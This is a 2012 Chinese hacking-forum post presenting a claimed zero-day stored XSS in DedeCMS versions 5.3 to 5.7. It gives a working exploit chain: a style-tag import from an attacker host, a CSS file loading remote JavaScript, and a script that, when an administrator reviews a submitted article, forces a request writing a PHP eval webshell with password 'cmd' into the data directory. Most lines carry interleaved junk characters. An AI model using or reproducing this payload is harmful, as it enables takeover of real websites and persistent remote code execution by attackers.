中国网络渗透测试联盟

标题: dedecms xss oday通杀所有版本 可getshell [打印本页]

作者: admin    时间: 2012-9-15 13:56
标题: dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
! F( u4 {) S6 n  c2 r为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)( Q& F8 L& F1 |0 s5 R* J/ ?
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
: ]% T8 j" [2 B7 h( _; d下面说说利用方法。
# I3 d) x/ G* V. y条件有2个:, B7 `, Q) e% d* F' E! P- l& X1 a0 c2 o
1.开启注册# l) Z% m. N2 U, q
2.开启投稿
4 P# Z$ X: Q. q注册会员----发表文章# W9 j. I3 }8 M, t0 y
内容填写:
) I+ z* J. R- h# s* u复制代码: ~* C5 b- U- T. \" H! f; d0 R
<style>@im\port'\http://xxx.com/xss.css';</style>9 B6 }+ h# Q) C* g& Q; v& Y
新建XSS.Css7 ?6 }) v( ]$ a* q5 X
复制代码# O- }4 y9 k% e1 n" Z! i( b' z
.body{. b5 E& w8 p* a% P5 w$ e
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }7 L1 ^  p; A  Y# q
新建xss.js 内容为3 \9 g$ L3 z+ H5 |" H
复制代码
4 W9 y+ c' g2 {. J# e0 r, a1.var request = false;7 b; D1 P/ b2 S! r2 Y: b5 ^* e5 |
2.if(window.XMLHttpRequest) {2 }% z8 a$ e& R3 a1 X, H5 w6 y
3.request = new XMLHttpRequest();) O- g, Q5 a8 A
4.if(request.overrideMimeType) {/ e& U! R$ b' ]  g5 ~
5.request.overrideMimeType('text/xml');( z$ |/ R# R# t
6.}* b& F3 }$ h! A5 j  f0 d2 ~$ r
7.} else if(window.ActiveXObject) {9 D1 \/ M# t2 a, r8 R1 S( v8 C& H7 S
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
% K+ J7 n0 w! M4 u& E+ p; |. A9.for(var i=0; i<versions.length; i++) {# r% F  v: v* a3 L2 T# S. c* \
10.try {: B: u2 s2 U& e5 h
11.request = new ActiveXObject(versions);
# M: L- j+ d  Y3 o$ V+ o12.} catch(e) {}% M% A4 h9 B/ z4 s
13.}2 A  `, U8 `! B* _4 S4 ]
14.}( d* ]" }6 e% V
15.xmlhttp=request;
: N- l. H2 Q! W9 M1 A16.function getFolder( url ){) H+ x1 y  ?7 m# `% r$ l
17. obj = url.split('/')) i, `: K* }$ |# B: A
18. return obj[obj.length-2]  z8 }  z, N- S$ O1 V4 S; k
19.}, n5 x7 w; W5 i# ~
20.oUrl = top.location.href;
+ M3 _9 I+ r/ y. V  [. A21.u = getFolder(oUrl);0 y" M6 E2 p9 x" K! W# X1 v, I
22.add_admin();$ R( v8 w/ s  v, @  B; S( ]
23.function add_admin(){
$ V5 e! k3 U4 B; X& ]24.var url= "/"+u+"/sys_sql_query.php";0 Q6 k; E! a2 P  k0 S
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";: ~0 Q7 l5 W) V$ t1 J4 d( H1 L
26.xmlhttp.open("POST", url, true);' `! l* O8 X" G3 J- ^1 p' k
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
9 E  y6 H2 B( f5 p- F' `- r' _6 d28.xmlhttp.setRequestHeader("Content-length", params.length);0 W0 u: V. P; l; q$ l* ~/ o
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");2 j' Q2 k' J! C6 U
30.xmlhttp.send(params);
7 ?3 c" |. D( u! t" w; h31.}
$ I) H, g. x& H  q5 T当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2